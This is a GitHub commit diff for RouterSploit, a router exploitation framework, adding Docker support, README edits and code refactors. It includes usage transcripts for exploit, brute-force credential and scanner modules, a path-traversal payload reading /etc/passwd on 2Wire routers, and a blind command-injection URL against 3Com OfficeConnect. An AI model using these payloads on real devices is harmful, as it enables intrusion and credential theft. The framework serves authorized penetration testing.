Skip to content

Commit

Permalink
Merge remote-tracking branch 'reverse-shell/master'
Browse files Browse the repository at this point in the history
  • Loading branch information
@BigNerd95
BigNerd95 committed Feb 20, 2017
2 parents 3f41dc4 + c42a0c6 commit 8a01c26
Show file tree
Hide file tree
Showing 49 changed files with 1,785 additions and 123 deletions.
8 changes: 8 additions & 0 deletions Dockerfile
View file
@@ -0,0 +1,8 @@
FROM python:2.7

WORKDIR /routersploit

RUN git clone https://github.com/reverse-shell/routersploit/ .
RUN pip install -r requirements.txt

CMD ["python", "rsf.py"]
11 changes: 11 additions & 0 deletions Makefile
View file
@@ -1,5 +1,7 @@
# Makefile that aggregates common chores before commit

.PHONY: all clean lint lint-modules test build update run help

MODULE=''

all: lint test
Expand All @@ -18,6 +20,15 @@ lint-modules:
test: clean
./run_tests.sh $(MODULE)

build:
docker build -t routersploit:latest -f Dockerfile .

update:
./run_docker.sh git pull

run:
./run_docker.sh

help:
@echo " clean"
@echo " Remove python artifacts."
Expand Down
66 changes: 36 additions & 30 deletions README.md
View file
Expand Up @@ -12,7 +12,7 @@ It consists of various modules that aids penetration testing operations:

- exploits - modules that take advantage of identified vulnerabilities
- creds - modules designed to test credentials against network services
- scanners - modules that check if target is vulnerable to any exploit
- scanners - modules that check if a target is vulnerable to any exploit

# Installation

Expand All @@ -29,7 +29,7 @@ It consists of various modules that aids penetration testing operations:
git clone https://github.com/reverse-shell/routersploit
cd routersploit
./rsf.py

## Installation on Ubuntu 16.04

sudo apt-get install python-dev python-pip libncurses5-dev git
Expand All @@ -46,16 +46,23 @@ It consists of various modules that aids penetration testing operations:
sudo pip install -r requirements.txt
./rsf.py

## Running on Docker

git clone https://github.com/reverse-shell/routersploit
cd routersploit
docker build -t routersploit:latest -f Dockerfile .
./run_docker.sh

# Update

Update RouterSploit Framework often. Project is under heavy development and new modules are shipped almost everyday.
Update RouterSploit Framework often. The project is under heavy development and new modules are shipped almost every day.

cd routersploit
git pull

# Usage

root@kalidev:~/git/routersploit# ./rsf.py
root@kalidev:~/git/routersploit# ./rsf.py
______ _ _____ _ _ _
| ___ \ | | / ___| | | (_) |
| |_/ /___ _ _| |_ ___ _ __\ `--. _ __ | | ___ _| |_
Expand All @@ -69,7 +76,7 @@ Update RouterSploit Framework often. Project is under heavy development and new
Codename : Wildest Dreams
Version : 1.0.0

rsf >
rsf >

## 1. Exploits

Expand All @@ -78,7 +85,7 @@ Update RouterSploit Framework often. Project is under heavy development and new
rsf > use exploits/
exploits/2wire/ exploits/asmax/ exploits/asus/ exploits/cisco/ exploits/dlink/ exploits/fortinet/ exploits/juniper/ exploits/linksys/ exploits/multi/ exploits/netgear/
rsf > use exploits/dlink/dir_300_600_rce
rsf (D-LINK DIR-300 & DIR-600 RCE) >
rsf (D-LINK DIR-300 & DIR-600 RCE) >

You can use the tab key for completion.

Expand All @@ -103,7 +110,7 @@ Set options:

### Run module

Exploiting target can be achieved by issuing 'run' or 'exploit' command:
You can exploit the target by issuing the 'run' or 'exploit' command:

rsf (D-LINK DIR-300 & DIR-600 RCE) > run
[+] Target is vulnerable
Expand Down Expand Up @@ -145,9 +152,9 @@ Display information about exploit:

### Pick module

Modules located under creds/ directory allow running dictionary attacks against various network services.
Modules located in the `creds/` directory allow running dictionary attacks against various network services.

Following services are currently supported:
The following services are currently supported:

- ftp
- ssh
Expand All @@ -158,31 +165,31 @@ Following services are currently supported:

Every service has been divided into two modules:

- default (e.g. ssh_default) - this kind of modules use one wordlist with default credentials pairs login:password. Module can be quickly used and in matter of seconds verify if the device uses default credentials.
- bruteforce (e.g. ssh_bruteforce) - this kind of modules perform dictionary attacks against specified account or list of accounts. It takes two parameters login and password. These values can be a single word (e.g. 'admin') or entire list of strings (file:///root/users.txt).
- default (e.g. ssh_default) - this kind of modules use one wordlist with default credentials pairs login:password. The module can be quickly used and in matter of seconds can verify if the device uses default credentials.
- bruteforce (e.g. ssh_bruteforce) - this kind of modules perform dictionary attacks against a specified account or list of accounts. It takes two parameters: login and password. These values can be a single word (e.g. 'admin') or an entire list of strings (file:///root/users.txt).

Console:

rsf > use creds/
creds/ftp_bruteforce creds/http_basic_bruteforce creds/http_form_bruteforce creds/snmp_bruteforce creds/ssh_default creds/telnet_default
creds/ftp_default creds/http_basic_default creds/http_form_default creds/ssh_bruteforce creds/telnet_bruteforce
rsf > use creds/ssh_default
rsf (SSH Default Creds) >
rsf (SSH Default Creds) >

### Options

rsf (SSH Default Creds) > show options

Target options:

Name Current settings Description
---- ---------------- -----------
target Target IP address
port 22 Target port


Module options:

Name Current settings Description
---- ---------------- -----------
threads 8 Numbers of threads
Expand Down Expand Up @@ -213,21 +220,21 @@ Set target:
[-] worker-7 Authentication failed. Username: 'ADVMAIL' Password: 'HP'
[-] worker-3 Authentication failed. Username: '266344' Password: '266344'
[-] worker-2 Authentication failed. Username: '1502' Password: '1502'

(..)

Elapsed time: 38.9181981087 seconds
[+] Credentials found!

Login Password
----- --------
admin 1234

rsf (SSH Default Creds) >
rsf (SSH Default Creds) >

## 3. Scanners

Scanners allow quickly verify if the target is vulnerable to any exploits.
Scanners allow you to quickly verify if the target is vulnerable to any exploits.

### Pick module

Expand All @@ -238,7 +245,7 @@ Scanners allow quickly verify if the target is vulnerable to any exploits.
### Options

Target options:

Name Current settings Description
---- ---------------- -----------
target Target address e.g. http://192.168.1.1
Expand All @@ -259,11 +266,11 @@ Set target:
[-] exploits/dlink/dir_645_password_disclosure is not vulnerable
[-] exploits/dlink/dir_300_600_615_info_disclosure is not vulnerable
[-] exploits/dlink/dir_300_600_rce is not vulnerable

[+] Device is vulnerable!
- exploits/dlink/dwr_932_info_disclosure

It has been verified that target is vulnerable to dwr\_932\_info\_disclosure exploit. Now use proper module and exploit target.
It has been verified that the target is vulnerable to dwr\_932\_info\_disclosure exploit. Now use the proper module and exploit target.

rsf (D-Link Scanner) > use exploits/dlink/dwr_932_info_disclosure
rsf (D-Link DWR-932 Info Disclosure) > set target 192.168.1.1
Expand All @@ -272,7 +279,7 @@ It has been verified that target is vulnerable to dwr\_932\_info\_disclosure exp
[*] Running module...
[*] Decoding JSON value
[+] Exploit success

Parameter Value
--------- -----
get_wps_enable 0
Expand All @@ -285,9 +292,8 @@ It has been verified that target is vulnerable to dwr\_932\_info\_disclosure exp
get_mac_filter_switch 0
wifi_AP1_passphrase MyPaSsPhRaSe
get_wps_mode 0

# License

License has been taken from BSD licensing and applied to RouterSploit Framework.
Please see LICENSE for more details.
# License

The RouterSploit Framework is under a BSD license.
Please see [LICENSE](LICENSE) for more details.
17 changes: 16 additions & 1 deletion routersploit/interpreter.py
View file
Expand Up @@ -159,6 +159,7 @@ class RoutersploitInterpreter(BaseInterpreter):
help Print this help menu
use <module> Select a module for usage
exec <shell command> <args> Execute a command in a shell
search <search term> Search for appropriate module
exit Exit RouterSploit"""

module_help = """Module commands:
Expand All @@ -180,7 +181,7 @@ def __init__(self):
self.prompt_hostname = 'rsf'
self.show_sub_commands = ('info', 'options', 'devices', 'all', 'creds', 'exploits', 'scanners')

self.global_commands = sorted(['use ', 'exec ', 'help', 'exit', 'show '])
self.global_commands = sorted(['use ', 'exec ', 'help', 'exit', 'show ', 'search '])
self.module_commands = ['run', 'back', 'set ', 'setg ', 'check']
self.module_commands.extend(self.global_commands)
self.module_commands.sort()
Expand Down Expand Up @@ -456,5 +457,19 @@ def command_help(self, *args, **kwargs):
def command_exec(self, *args, **kwargs):
os.system(args[0])

def command_search(self, *args, **kwargs):
keyword = args[0]

if not keyword:
utils.print_error("Please specify search keyword. e.g. 'search cisco'")
return

for module in self.modules:
if keyword in module:
module = utils.humanize_path(module)
utils.print_info(
"{}\033[31m{}\033[0m{}".format(*module.partition(keyword))
)

def command_exit(self, *args, **kwargs):
raise EOFError
4 changes: 2 additions & 2 deletions routersploit/modules/creds/ftp_bruteforce.py
View file
Expand Up @@ -56,7 +56,7 @@ def attack(self):
ftp = ftplib.FTP()
try:
ftp.connect(self.target, port=int(self.port), timeout=10)
except socket.error, socket.timeout:
except (socket.error, socket.timeout):
print_error("Connection error: %s:%s" % (self.target, str(self.port)))
ftp.close()
return
Expand Down Expand Up @@ -105,7 +105,7 @@ def target_function(self, running, data):
try:
ftp.connect(self.target, port=int(self.port), timeout=10)
break
except socket.error, socket.timeout:
except (socket.error, socket.timeout):
print_error("{} Connection problem. Retrying...".format(name), verbose=module_verbosity)
retries += 1

Expand Down
2 changes: 1 addition & 1 deletion routersploit/modules/creds/ftp_default.py
View file
Expand Up @@ -54,7 +54,7 @@ def attack(self):
ftp = ftplib.FTP()
try:
ftp.connect(self.target, port=int(self.port), timeout=10)
except socket.error, socket.timeout:
except (socket.error, socket.timeout):
print_error("Connection error: %s:%s" % (self.target, str(self.port)))
ftp.close()
return
Expand Down
2 changes: 1 addition & 1 deletion routersploit/modules/creds/http_basic_bruteforce.py
View file
Expand Up @@ -37,7 +37,7 @@ class Exploit(exploits.Exploit):
],
}

target = exploits.Option('', 'Target IP address or file with target:port (file://)', validators=validators.url)
target = exploits.Option('', 'Target IP address or file with target:port (file://)')
port = exploits.Option(80, 'Target port')

threads = exploits.Option(8, 'Numbers of threads')
Expand Down
2 changes: 1 addition & 1 deletion routersploit/modules/creds/http_basic_default.py
View file
Expand Up @@ -36,7 +36,7 @@ class Exploit(exploits.Exploit):
],
}

target = exploits.Option('', 'Target IP address or file with target:port (file://)', validators=validators.url)
target = exploits.Option('', 'Target IP address or file with target:port (file://)')
port = exploits.Option(80, 'Target port')
threads = exploits.Option(8, 'Number of threads')
defaults = exploits.Option(wordlists.defaults, 'User:Pass or file with default credentials (file://)')
Expand Down
4 changes: 2 additions & 2 deletions routersploit/modules/exploits/2wire/4011g_5012nv_path_traversal.py
View file
Expand Up @@ -47,7 +47,7 @@ def run(self):

data = {"__ENH_SHOW_REDIRECT_PATH__": "/pages/C_4_0.asp/../../..{}".format(self.filename),
"__ENH_SUBMIT_VALUE_SHOW__": "Acceder",
"__ENH_SUBMIT_VALUE_SHOW__": "",
"__ENH_ERROR_REDIRECT_PATH__": "",
"username": "tech"}

response = http_request(method="POST", url=url, headers=headers, data=data)
Expand All @@ -67,7 +67,7 @@ def check(self):

data = {"__ENH_SHOW_REDIRECT_PATH__": "/pages/C_4_0.asp/../../../etc/passwd",
"__ENH_SUBMIT_VALUE_SHOW__": "Acceder",
"__ENH_SUBMIT_VALUE_SHOW__": "",
"__ENH_ERROR_REDIRECT_PATH__": "",
"username": "tech"}

response = http_request(method="POST", url=url, headers=headers, data=data)
Expand Down
20 changes: 4 additions & 16 deletions routersploit/modules/exploits/3com/officeconnect_rce.py
View file
Expand Up @@ -3,11 +3,11 @@
print_success,
print_status,
print_error,
print_info,
http_request,
mute,
validators,
random_text,
shell
)


Expand Down Expand Up @@ -40,27 +40,15 @@ def run(self):
print_success("Target is vulnerable")
print_status("Invoking command loop...")
print_status("It is blind command injection - response is not available")
self.command_loop()
shell(self, architecture="mips")
else:
print_error("Target is not vulnerable")

def command_loop(self):
while 1:
cmd = raw_input("cmd > ")

if cmd in ['exit', 'quit']:
return

print_info(self.execute(cmd))

def execute(self, cmd):
url = "{}:{}/utility.cgi?testType=1&IP=aaa || {}".format(self.target, self.port, cmd)

response = http_request(method="GET", url=url)
if response is None:
return ""

return response.text
http_request(method="GET", url=url)
return ""

@mute
def check(self):
Expand Down

0 comments on commit 8a01c26

Please sign in to comment.